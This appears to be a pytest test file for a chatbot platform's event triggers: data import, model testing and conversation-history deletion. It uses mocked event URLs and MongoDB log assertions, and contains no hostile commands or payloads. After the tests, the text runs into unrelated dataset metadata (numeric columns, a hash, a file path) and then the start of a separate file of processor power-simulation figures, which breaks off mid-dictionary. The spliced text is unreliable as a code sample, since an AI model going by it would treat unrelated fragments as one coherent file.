assert len(list(processor.fetch_training_examples(bot))) == 7
assert len(list(processor.fetch_responses(bot))) == 4
assert len(processor.fetch_actions(bot)) == 2
assert len(processor.fetch_rule_block_names(bot)) == 4
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_and_save_append(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/append', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"http_actions", "rules"})
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 7
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
processor = MongoProcessor()
assert 'greet' in processor.fetch_intents(bot)
assert 'deny' in processor.fetch_intents(bot)
assert 'location' in processor.fetch_intents(bot)
assert 'affirm' in processor.fetch_intents(bot)
assert len(processor.fetch_stories(bot)) == 4
assert len(list(processor.fetch_training_examples(bot))) == 13
assert len(list(processor.fetch_responses(bot))) == 6
assert len(processor.fetch_actions(bot)) == 4
assert len(processor.fetch_rule_block_names(bot)) == 4
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_and_save_overwrite_same_user(self, monkeypatch):
bot = 'test_events'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/valid', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=REQUIREMENTS - {"http_actions"})
await EventsTrigger.trigger_data_importer(bot, user, True, True)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 8
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
processor = MongoProcessor()
assert 'greet' in processor.fetch_intents(bot)
assert 'deny' in processor.fetch_intents(bot)
assert len(processor.fetch_stories(bot)) == 2
assert len(list(processor.fetch_training_examples(bot))) == 7
assert len(list(processor.fetch_responses(bot))) == 4
assert len(processor.fetch_actions(bot)) == 2
assert len(processor.fetch_rule_block_names(bot)) == 4
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_event(self, monkeypatch):
bot = 'test_events_bot'
user = 'test_user'
event_url = "http://url.event"
monkeypatch.setitem(Utility.environment['model']['data_importer'], "event_url", event_url)
responses.add("POST",
event_url,
json={"message": "Event triggered successfully!"},
status=200,
match=[
responses.json_params_matcher(
[{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user},
{'name': 'IMPORT_DATA', 'value': '--import-data'},
{'name': 'OVERWRITE', 'value': ''}])],
)
responses.start()
await EventsTrigger.trigger_data_importer(bot, user, True, False)
responses.stop()
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert not logs[0].get('end_timestamp')
assert not logs[0].get('status')
assert logs[0]['event_status'] == EVENT_STATUS.TASKSPAWNED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_and_save_event_overwrite(self, monkeypatch):
bot = 'test_events_bot_1'
user = 'test_user'
event_url = "http://url.event2"
monkeypatch.setitem(Utility.environment['model']['data_importer'], "event_url", event_url)
responses.add("POST",
event_url,
json={"message": "Event triggered successfully!"},
status=200,
match=[
responses.json_params_matcher(
[{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user},
{'name': 'IMPORT_DATA', 'value': '--import-data'},
{'name': 'OVERWRITE', 'value': '--overwrite'}])],
)
responses.start()
await EventsTrigger.trigger_data_importer(bot, user, True, True)
responses.stop()
request = json.loads(responses.calls[1].request.body)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert not logs[0].get('end_timestamp')
assert not logs[0].get('status')
assert logs[0]['event_status'] == EVENT_STATUS.TASKSPAWNED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_only_event(self, monkeypatch):
bot = 'test_events_bot_1'
user = 'test_user'
event_url = "http://url.event3"
monkeypatch.setitem(Utility.environment['model']['data_importer'], "event_url", event_url)
responses.add("POST",
event_url,
json={"message": "Event triggered successfully!"},
status=200,
match=[
responses.json_params_matcher(
[{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user},
{'name': 'IMPORT_DATA', 'value': ''},
{'name': 'OVERWRITE', 'value': ''}])],
)
responses.start()
await EventsTrigger.trigger_data_importer(bot, user, False, False)
responses.stop()
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert not logs[0].get('end_timestamp')
assert not logs[0].get('status')
assert logs[0]['event_status'] == EVENT_STATUS.TASKSPAWNED.value
@pytest.mark.asyncio
async def test_trigger_data_importer_event_connection_error(self, monkeypatch):
bot = 'test_events_bot_1'
user = 'test_user'
event_url = "http://url.event4"
monkeypatch.setitem(Utility.environment['model']['data_importer'], "event_url", event_url)
await EventsTrigger.trigger_data_importer(bot, user, False, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert not [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert logs[0].get('exception').__contains__('Failed to trigger the event.')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
@pytest.mark.asyncio
async def test_trigger_data_importer_nlu_only(self, monkeypatch, get_training_data):
bot = 'test_trigger_data_importer'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
nlu_path = os.path.join(test_data_path, 'data')
Utility.make_dirs(nlu_path)
shutil.copy2('tests/testing_data/validator/valid/data/nlu.yml', nlu_path)
nlu, story_graph, domain, config, http_actions = await get_training_data('tests/testing_data/validator/valid')
mongo_processor = MongoProcessor()
mongo_processor.save_domain(domain, bot, user)
mongo_processor.save_stories(story_graph.story_steps, bot, user)
config["bot"] = bot
config["user"] = user
config_obj = Configs._from_son(config)
config_obj.save()
mongo_processor.save_rules(story_graph.story_steps, bot, user)
mongo_processor.save_integrated_actions(http_actions, bot, user)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=["nlu"])
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
assert len(mongo_processor.fetch_stories(bot)) == 2
assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
assert len(list(mongo_processor.fetch_responses(bot))) == 3
assert len(mongo_processor.fetch_actions(bot)) == 2
assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_stories_only(self, monkeypatch, get_training_data):
bot = 'test_trigger_data_importer_stories_only'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
data_path = os.path.join(test_data_path, 'data')
Utility.make_dirs(data_path)
shutil.copy2('tests/testing_data/validator/valid/data/stories.yml', data_path)
nlu, story_graph, domain, config, http_actions = await get_training_data('tests/testing_data/validator/valid')
mongo_processor = MongoProcessor()
mongo_processor.save_domain(domain, bot, user)
mongo_processor.save_nlu(nlu, bot, user)
config["bot"] = bot
config["user"] = user
config_obj = Configs._from_son(config)
config_obj.save()
mongo_processor.save_rules(story_graph.story_steps, bot, user)
mongo_processor.save_integrated_actions(http_actions, bot, user)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=["stories"])
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
assert len(mongo_processor.fetch_stories(bot)) == 2
assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
assert len(list(mongo_processor.fetch_responses(bot))) == 3
assert len(mongo_processor.fetch_actions(bot)) == 2
assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_rules_only(self, monkeypatch, get_training_data):
bot = 'test_trigger_data_importer_rules_only'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
data_path = os.path.join(test_data_path, 'data')
Utility.make_dirs(data_path)
shutil.copy2('tests/testing_data/validator/valid/data/rules.yml', data_path)
nlu, story_graph, domain, config, http_actions = await get_training_data('tests/testing_data/validator/valid')
mongo_processor = MongoProcessor()
mongo_processor.save_domain(domain, bot, user)
mongo_processor.save_nlu(nlu, bot, user)
config["bot"] = bot
config["user"] = user
config_obj = Configs._from_son(config)
config_obj.save()
mongo_processor.save_stories(story_graph.story_steps, bot, user)
mongo_processor.save_integrated_actions(http_actions, bot, user)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=["rules"])
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
assert len(mongo_processor.fetch_stories(bot)) == 2
assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
assert len(list(mongo_processor.fetch_responses(bot))) == 3
assert len(mongo_processor.fetch_actions(bot)) == 2
assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_domain_only(self, monkeypatch, get_training_data):
bot = 'test_trigger_data_importer_domain_only'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
Utility.make_dirs(test_data_path)
shutil.copy2('tests/testing_data/validator/valid/domain.yml', test_data_path)
nlu, story_graph, domain, config, http_actions = await get_training_data('tests/testing_data/validator/valid')
mongo_processor = MongoProcessor()
mongo_processor.save_stories(story_graph.story_steps, bot, user)
mongo_processor.save_nlu(nlu, bot, user)
config["bot"] = bot
config["user"] = user
config_obj = Configs._from_son(config)
config_obj.save()
mongo_processor.save_rules(story_graph.story_steps, bot, user)
mongo_processor.save_integrated_actions(http_actions, bot, user)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user, files_received=["domain"])
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
assert len(mongo_processor.fetch_stories(bot)) == 2
assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
assert len(list(mongo_processor.fetch_responses(bot))) == 3
assert len(mongo_processor.fetch_actions(bot)) == 2
assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_validate_existing_data(self, monkeypatch, get_training_data):
bot = 'test_trigger_data_importer_domain_only'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
Utility.make_dirs(test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
DataImporterLogProcessor.add_log(bot, user)
await EventsTrigger.trigger_data_importer(bot, user, True, False)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 2
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions'] == [[]]
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
mongo_processor = MongoProcessor()
assert len(mongo_processor.fetch_stories(bot)) == 2
assert len(list(mongo_processor.fetch_training_examples(bot))) == 7
assert len(list(mongo_processor.fetch_responses(bot))) == 3
assert len(mongo_processor.fetch_actions(bot)) == 2
assert len(mongo_processor.fetch_rule_block_names(bot)) == 3
@pytest.mark.asyncio
async def test_trigger_data_importer_import_with_utterance_issues(self, monkeypatch):
bot = 'test_trigger_data_importer_import_with_utterance_issues'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/orphan_utterances', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
BotSettings(ignore_utterances=True, bot=bot, user=user).save()
DataImporterLogProcessor.add_log(bot, user, files_received=['nlu', 'stories', 'domain', 'config'])
await EventsTrigger.trigger_data_importer(bot, user, True, True)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
mongo_processor = MongoProcessor()
assert len(mongo_processor.fetch_stories(bot)) == 2
assert len(list(mongo_processor.fetch_training_examples(bot))) == 8
assert len(list(mongo_processor.fetch_responses(bot))) == 8
assert len(mongo_processor.fetch_actions(bot)) == 0
assert len(mongo_processor.fetch_rule_block_names(bot)) == 1
@pytest.mark.asyncio
async def test_trigger_data_importer_import_with_intent_issues(self, monkeypatch):
bot = 'test_trigger_data_importer_import_with_intent_issues'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/intent_name_mismatch', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
BotSettings(ignore_utterances=True, bot=bot, user=user).save()
DataImporterLogProcessor.add_log(bot, user, files_received=['nlu', 'stories', 'domain', 'config'])
await EventsTrigger.trigger_data_importer(bot, user, True, True)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert not logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Failure'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
mongo_processor = MongoProcessor()
assert len(mongo_processor.fetch_stories(bot)) == 0
assert len(list(mongo_processor.fetch_training_examples(bot))) == 0
assert len(list(mongo_processor.fetch_responses(bot))) == 0
assert len(mongo_processor.fetch_actions(bot)) == 0
assert len(mongo_processor.fetch_rule_block_names(bot)) == 0
@pytest.mark.asyncio
async def test_trigger_data_importer_forced_import(self, monkeypatch):
bot = 'forced_import'
user = 'test'
test_data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
shutil.copytree('tests/testing_data/validator/orphan_utterances', test_data_path)
def _path(*args, **kwargs):
return test_data_path
monkeypatch.setattr(Utility, "get_latest_file", _path)
BotSettings(force_import=True, bot=bot, user=user).save()
DataImporterLogProcessor.add_log(bot, user, files_received=['nlu', 'stories', 'domain', 'config'])
await EventsTrigger.trigger_data_importer(bot, user, True, True)
logs = list(DataImporterLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('intents').get('data')
assert not logs[0].get('stories').get('data')
assert logs[0].get('utterances').get('data')
assert [action.get('data') for action in logs[0].get('actions') if action.get('type') == 'http_actions']
assert not logs[0].get('training_examples').get('data')
assert not logs[0].get('domain').get('data')
assert not logs[0].get('config').get('data')
assert not logs[0].get('exception')
assert logs[0]['is_data_uploaded']
assert logs[0]['start_timestamp']
assert logs[0]['end_timestamp']
assert logs[0]['status'] == 'Success'
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
mongo_processor = MongoProcessor()
assert len(mongo_processor.fetch_stories(bot)) == 2
assert len(list(mongo_processor.fetch_training_examples(bot))) == 8
assert len(list(mongo_processor.fetch_responses(bot))) == 8
assert len(mongo_processor.fetch_actions(bot)) == 0
assert len(mongo_processor.fetch_rule_block_names(bot)) == 1
def test_trigger_model_testing_event_run_tests_on_model_no_model_found(self):
bot = 'test_events_bot'
user = 'test_user'
EventsTrigger.trigger_model_testing(bot, user, False)
logs = list(ModelTestingLogProcessor.get_logs(bot))
assert len(logs) == 1
assert logs[0].get('exception').__contains__('Model testing failed: Folder does not exists!')
assert logs[0]['start_timestamp']
assert not logs[0].get('stories')
assert not logs[0].get('nlu')
assert logs[0].get('end_timestamp')
assert not logs[0].get('status')
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
assert not os.path.exists(os.path.join('./testing_data', bot))
@pytest.fixture
def load_data(self):
async def _read_and_get_data(config_path: str, domain_path: str, nlu_path: str, stories_path: str, bot: str, user: str):
data_path = os.path.join(pytest.tmp_dir, str(uuid.uuid4()))
os.mkdir(data_path)
shutil.copy2(nlu_path, data_path)
shutil.copy2(stories_path, data_path)
importer = RasaFileImporter.load_from_config(config_path=config_path,
domain_path=domain_path,
training_data_paths=data_path)
domain = await importer.get_domain()
story_graph = await importer.get_stories()
config = await importer.get_config()
nlu = await importer.get_nlu_data(config.get('language'))
processor = MongoProcessor()
processor.save_training_data(bot, user, config, domain, story_graph, nlu, overwrite=True)
return _read_and_get_data
@pytest.fixture
def create_model(self):
def move_model(path: str, bot: str, remove_nlu_model=False):
bot_training_home_dir = os.path.join('models', bot)
if not os.path.exists(bot_training_home_dir):
os.mkdir(bot_training_home_dir)
if remove_nlu_model:
tmp = os.path.join(bot_training_home_dir, 'tmp')
shutil.unpack_archive(path, tmp)
shutil.rmtree(os.path.join(tmp, 'nlu'))
shutil.make_archive(tmp, format='gztar', root_dir=bot_training_home_dir)
shutil.rmtree(tmp)
else:
shutil.copy2(path, bot_training_home_dir)
return move_model
@pytest.mark.asyncio
async def test_trigger_model_testing_event_run_tests_on_model(self, load_data, create_model, monkeypatch):
import rasa.utils.common
bot = 'test_events_bot'
user = 'test_user'
config_path = 'tests/testing_data/model_tester/config.yml'
domain_path = 'tests/testing_data/model_tester/domain.yml'
nlu_path = 'tests/testing_data/model_tester/nlu_success/nlu.yml'
stories_path = 'tests/testing_data/model_tester/training_stories_success/stories.yml'
await load_data(config_path, domain_path, nlu_path, stories_path, bot, user)
create_model(pytest.model_path, bot)
def _mock_stories_output(*args, **kwargs):
return {
"precision": 0.91,
"f1": 0.98,
"accuracy": 0.99,
"failed_stories": [],
}
monkeypatch.setattr(rasa.utils.common, 'run_in_loop', _mock_stories_output)
responses.add('POST',
Utility.environment["augmentation"]["paraphrase_url"],
json={'data': {'paraphrases': ['common training example']}})
responses.start()
EventsTrigger.trigger_model_testing(bot, user, False)
logs = list(ModelTestingLogProcessor.get_logs(bot))
assert len(logs) == 2
assert not logs[0].get('exception')
assert logs[0]['start_timestamp']
assert logs[0].get('data')
assert logs[0].get('end_timestamp')
assert not Utility.check_empty_string(logs[0].get('status'))
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
assert not os.path.exists(os.path.join('./testing_data', bot))
def test_trigger_model_testing_event_connection_error(self, monkeypatch):
bot = 'test_events_bot'
user = 'test_user'
event_url = "http://url.event"
monkeypatch.setitem(Utility.environment['model']['test'], "event_url", event_url)
EventsTrigger.trigger_model_testing(bot, user, True)
logs = list(ModelTestingLogProcessor.get_logs(bot))
assert len(logs) == 3
assert logs[0].get('exception').__contains__('Failed to trigger the event. ')
assert logs[0]['start_timestamp']
assert not logs[0].get('data')
assert logs[0].get('end_timestamp')
assert not logs[0].get('status')
assert logs[0]['event_status'] == EVENT_STATUS.FAIL.value
assert not os.path.exists(os.path.join('./testing_data', bot))
@pytest.mark.asyncio
async def test_trigger_model_testing(self, load_data, create_model, monkeypatch):
bot = 'test_events_bot'
user = 'test_user'
def _mock_test_result(*args, **kwargs):
stories = {
"precision": 0.91,
"f1": 0.98,
"accuracy": 0.99,
"failed_stories": [],
}
nlu = {
"precision": 0.91,
"f1": 0.98,
"accuracy": 0.99,
"response_selection_evaluation": [],
"intent_evaluation": [],
}
return nlu, stories
monkeypatch.setattr(ModelTester, "run_tests_on_model", _mock_test_result)
EventsTrigger.trigger_model_testing(bot, user)
config_path = 'tests/testing_data/model_tester/config.yml'
domain_path = 'tests/testing_data/model_tester/domain.yml'
nlu_path = 'tests/testing_data/model_tester/nlu_success/nlu.yml'
stories_path = 'tests/testing_data/model_tester/test_stories_success/test_stories.yml'
await load_data(config_path, domain_path, nlu_path, stories_path, bot, user)
create_model(pytest.model_path, bot)
logs = list(ModelTestingLogProcessor.get_logs(bot))
assert len(logs) == 4
assert not logs[0].get('exception')
assert logs[0]['start_timestamp']
assert logs[0].get('end_timestamp')
assert logs[0].get('status')
assert logs[0].get('data')
assert logs[0]['event_status'] == EVENT_STATUS.COMPLETED.value
assert not os.path.exists(os.path.join('./testing_data', bot))
def test_trigger_model_testing_event(self, monkeypatch):
bot = 'test_events_bot'
user = 'test_user'
event_url = "http://url.event"
monkeypatch.setitem(Utility.environment['model']['test'], "event_url", event_url)
responses.add("POST",
event_url,
json={"message": "Event triggered successfully!"},
status=200,
match=[
responses.json_params_matcher(
[{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user}])],
)
responses.start()
EventsTrigger.trigger_model_testing(bot, user)
responses.stop()
logs = list(ModelTestingLogProcessor.get_logs(bot))
assert len(logs) == 5
assert not logs[0].get('exception')
assert logs[0]['start_timestamp']
assert not logs[0].get('end_timestamp')
assert not logs[0].get('status')
assert logs[0]['event_status'] == EVENT_STATUS.TASKSPAWNED.value
assert not os.path.exists(os.path.join('./testing_data', bot))
def test_trigger_history_deletion_for_bot(self, monkeypatch):
bot = 'test_events_bot'
user = 'test_user'
month = 1
sender_id = None
event_url = "http://url.event"
monkeypatch.setitem(Utility.environment['history_server']['deletion'], "event_url", event_url)
responses.add("POST",
event_url,
json={"message": "Event triggered successfully!"},
status=200,
match=[
responses.json_params_matcher(
[{'name': 'BOT', 'value': bot}, {'name': 'USER', 'value': user},
{'name': 'MONTH', 'value': month}, {'name': 'SENDER_ID', 'value': sender_id}])],
)
responses.start()
EventsTrigger.trigger_history_deletion(bot, user, month)
responses.stop()
logs = list(HistoryDeletionLogProcessor.get_logs(bot))
assert len(logs) == 1
assert not logs[0].get('exception')
assert logs[0]['start_timestamp']
assert not logs[0].get('end_timestamp')
assert logs[0]['status'] == EVENT_STATUS.TASKSPAWNED.value
| 48.575248
| 128
| 0.638348
| 6,101
| 49,061
| 4.920669
| 0.043108
| 0.0478
| 0.048233
| 0.067153
| 0.896806
| 0.891809
| 0.877919
| 0.867326
| 0.855967
| 0.834649
| 0
| 0.011874
| 0.227553
| 49,061
| 1,009
| 129
| 48.623389
| 0.780299
| 0.000448
| 0
| 0.78771
| 0
| 0
| 0.163818
| 0.037625
| 0
| 0
| 0
| 0
| 0.424581
| 1
| 0.030168
| false
| 0
| 0.138547
| 0.018994
| 0.194413
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9843d61dd43be181d40c406d7fe6b2351b1aadda
| 68,651
|
py
|
Python
|
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC_2/cmp_milc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC_2/cmp_milc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/_bigLittle_hrrs_spec_tugberk_ml/SystemIPC_2/cmp_milc/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.132204,
